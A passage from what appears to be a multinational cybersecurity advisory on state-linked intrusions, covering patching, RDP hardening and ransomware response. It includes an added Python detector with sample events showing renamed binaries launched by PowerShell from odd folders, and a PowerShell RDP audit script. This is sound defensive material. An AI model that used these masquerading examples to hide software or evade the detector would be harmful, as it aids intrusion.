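    {"image": r"C:\Program Files\WinRAR\WinRAR.exe", "parent": r"C:\Windows\explorer.exe"},
    {"image": r"C:\PerfLogs\FileZilla.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
]


def split_path(path):
    """Return (lowercase directory, lowercase file name) for a Windows path."""
    directory, name = ntpath.split(path)
    return directory.lower().rstrip("\\"), name.lower()


def assess(event):
    """Return (severity, reason) when a known name runs from an unexpected place, else None."""
    directory, name = split_path(event["image"])
    expected = EXPECTED_DIRS.get(name)
    if expected is None or directory in expected:
        return None
    _parent_dir, parent_name = split_path(event["parent"])
    if parent_name in SHELL_PARENTS:
        return ("high", f"{name} ran from {directory} with parent {parent_name}")
    return ("medium", f"{name} ran from {directory}; expected one of {sorted(expected)}")


def review(events):
    """Return [(image, severity, reason)] for every flagged record, in input order."""
    findings = []
    for event in events:
        verdict = assess(event)
        if verdict:
            findings.append((event["image"], verdict[0], verdict[1]))
    return findings


if __name__ == "__main__":
    for image, severity, reason in review(SAMPLE_EVENTS):
        print(f"[{severity}] {image}: {reason}")
```

Path comparison alone does not catch a renamed binary dropped into System32 itself; pair this review with signature checks on the flagged files and with the IOC hash sweep described earlier on this page.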
The authoring agencies urge network defenders to prepare for and mitigate potential cyber threats immediately by implementing the mitigations below.
Implement and Enforce Backup and Restoration Policies and Procedures
Maintain offline (i.e., physically disconnected) backups of data, and regularly test backup and restoration. These practices safeguard an organization’s continuity of operations or at least minimize potential downtime from a ransomware or other destructive data incident and protect against data losses.
Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure.
Activate BitLocker on all networks and securely back up BitLocker keys with Microsoft and with an independent offline backup.
Create, maintain, and exercise a basic cyber incident response plan that includes response procedures for a ransom incident.
Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, secure location (e.g., hard drive, storage device, the cloud).
Patch and Update Systems
U.S. federal, state, local, tribal, and territorial (SLTT) government and critical infrastructure organizations: Implement free CISA Cyber Hygiene Services Vulnerability Scanning to enable continuous scans of public, static IPs for accessible services and vulnerabilities.
Install updates/patch operating systems, software, and firmware as soon as updates/patches are released. Regularly check software updates and end-of-life notifications. Consider leveraging a centralized patch management system to automate and expedite the process.
Immediately patch software affected by vulnerabilities identified in this advisory: CVE-2021-34473, CVE-2018-13379, CVE-2020-12812, CVE-2019-5591, CVE-2021-34523, CVE-2021-31207, CVE-2021-44228, CVE-2021-45046, CVE-2021-45105, CVE-2021-31196, CVE-2021-31206, CVE-2021-33768, CVE-2021-33766, and CVE-2021-34470.
Evaluate and Update Blocklists and Allowlists
Regularly evaluate and update blocklists and allowlists.
If FortiOS is not used by your organization, add the key artifact files used by FortiOS to your organization’s execution blocklist. Prevent any attempts to install or run this program and its associated files.
Implement Network Segmentation
Implement network segmentation to restrict a malicious threat actor’s lateral movement.
Secure User Accounts
Audit user accounts with administrative privileges and configure access controls under the principles of least privilege and separation of duties.
Require administrator credentials to install software.
Implement Multifactor Authentication
Use multifactor authentication where possible, particularly for webmail, virtual private networks (VPNs), accounts that access critical systems, and privileged accounts that manage backups.
Use Strong Passwords
Secure and Monitor RDP and other Potentially Risky Services
If you use RDP, restrict it to limit access to resources over internal networks. After assessing risks, if your organization deems RDP operationally necessary, restrict the originating sources, and require MFA to mitigate credential theft and reuse. If RDP must be available externally, use a VPN, virtual desktop infrastructure, or other means to authenticate and secure the connection before allowing RDP to connect to internal devices.
Disable unused remote access/RDP ports.
Monitor remote access/RDP logs, enforce account lockouts after a specified number of attempts (to block brute force campaigns), and log RDP login attempts.
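The RDP checks in this section can be verified on a host with the following PowerShell script, an added example that is not part of the advisory. It reports whether RDP is enabled and requires Network Level Authentication, the local lockout threshold, failed RDP logons grouped by source address, and every successful RDP logon in the window. The 24-hour window and the 10-failure threshold are assumptions.

```powershell
# Added example (not from the advisory): audit a Windows host's RDP settings and its recent
# RDP logon activity from the Security log. Run as an administrator; the 24-hour window and
# the 10-failure threshold are assumptions. "net accounts" shows the local lockout policy;
# on a domain member add /domain to see the policy that actually applies to domain accounts.
$since = (Get-Date).AddHours(-24)
$threshold = 10

# RDP configuration: is RDP enabled at all, and is Network Level Authentication required?
$ts  = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
$nla = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp'
[pscustomobject]@{
    RdpEnabled       = ($ts.fDenyTSConnections -eq 0)
    NlaRequired      = ($nla.UserAuthentication -eq 1)
    ListeningPort    = $nla.PortNumber
    LockoutThreshold = ((net accounts) -match 'Lockout threshold') -replace '^.*:\s*', ''
} | Format-List

# Pull one named field from an event's EventData by name rather than by positional index.
function Get-EvData($Event, $Name) {
    (([xml]$Event.ToXml()).Event.EventData.Data | Where-Object Name -eq $Name).'#text'
}
function Get-RdpLogons($Id) {
    # Logon type 10 (RemoteInteractive) is the RDP case for both 4624 (success) and 4625 (failure).
    Get-WinEvent -FilterHashtable @{LogName='Security'; Id=$Id; StartTime=$since} -ErrorAction SilentlyContinue |
        Where-Object { (Get-EvData $_ 'LogonType') -eq '10' } |
        ForEach-Object { [pscustomobject]@{ Time = $_.TimeCreated; User = Get-EvData $_ 'TargetUserName'; SourceIp = Get-EvData $_ 'IpAddress' } }
}

# Failed RDP logons grouped by source address: sources at or above the threshold look like
# password guessing and are candidates for blocking at the firewall or VPN.
Get-RdpLogons 4625 | Group-Object SourceIp | Where-Object Count -ge $threshold | Sort-Object Count -Descending |
    Select-Object @{n='SourceIp'; e={$_.Name}}, Count, @{n='Users'; e={($_.Group.User | Sort-Object -Unique) -join ','}} |
    Format-Table -AutoSize

# Every successful RDP logon in the window should be attributable to a known administrator and source.
Get-RdpLogons 4624 | Sort-Object Time | Format-Table Time, User, SourceIp -AutoSize
```

A "Never" lockout threshold together with RdpEnabled = True and NlaRequired = False is the combination this section tells you to eliminate; any source address listed in the failure table that is not an internal jump host or VPN concentrator indicates RDP is reachable from where it should not be.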
Use Antivirus Programs
Install and regularly update antivirus and anti-malware software on all hosts.
Secure Remote Access
Only use secure networks.
Consider installing and using a VPN for remote access.
VALIDATE SECURITY CONTROLS
In addition to applying mitigations, the authoring agencies recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
Select an ATT&CK technique described in this advisory (see Appendix B).
Align your security technologies against the technique.
Test your technologies against the technique.
Analyze your detection and prevention technologies' performance.
Repeat the process for all security technologies to obtain a set of comprehensive performance data.
Tune your security program, including people, processes, and technologies, based on the data generated by this process.
The authoring agencies recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
RESPONDING TO RANSOMWARE OR EXTORTION INCIDENTS
If a ransomware or extortion incident occurs at your organization:
Note: The authoring agencies strongly discourage paying ransoms as doing so does not guarantee files and records will be recovered and may pose sanctions risks.
RESOURCES
The U.S. Department of State’s Rewards for Justice (RFJ) program offers a reward of up to $10 million for reports of foreign government malicious activity against U.S. critical infrastructure. See the RFJ website for more information and how to report information securely.
For more information on Iranian government-sponsored malicious cyber activity, see us-cert.cisa.gov/Iran and FBI's Iran Threat page.
For information and resources on protecting against and responding to ransomware or extortion activity, refer to StopRansomware.gov, the U.S. centralized, whole-of-government webpage providing ransomware resources and alerts.
The joint advisory from the cybersecurity authorities of Australia, Canada, New Zealand, the United Kingdom, and the United States: Technical Approaches to Uncovering and Remediating Malicious Activity provides additional guidance when hunting or investigating a network and common mistakes to avoid in incident handling.
CISA offers a range of no-cost cyber hygiene services to help critical infrastructure organizations assess, identify, and reduce their exposure to threats. By requesting these services, organizations of any size could find ways to reduce their risk and mitigate malicious activity.
ACSC can provide tailored cyber security advice and assistance, reporting, and incident response support at cyber.gov.au and via 1300 292 371 (1300 CYBER1).
PURPOSE
This advisory was developed by U.S., Australian, Canadian, and UK cybersecurity authorities in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations.
DISCLAIMER
The information in this report is being provided “as is” for informational purposes only. FBI, CISA, NSA, USCC-CNMF, DoT, ACSC, CCCS, and NCSC do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring.
APPENDIX A: INDICATORS OF COMPROMISE
IP addresses and executable files are listed below. For a downloadable copy of IOCs, see AA22-257A.stix.
IP Addresses
Note: Some of these observed IP addresses may be outdated. The authoring agencies recommend organizations investigate or vet these IP addresses prior to taking action, such as blocking.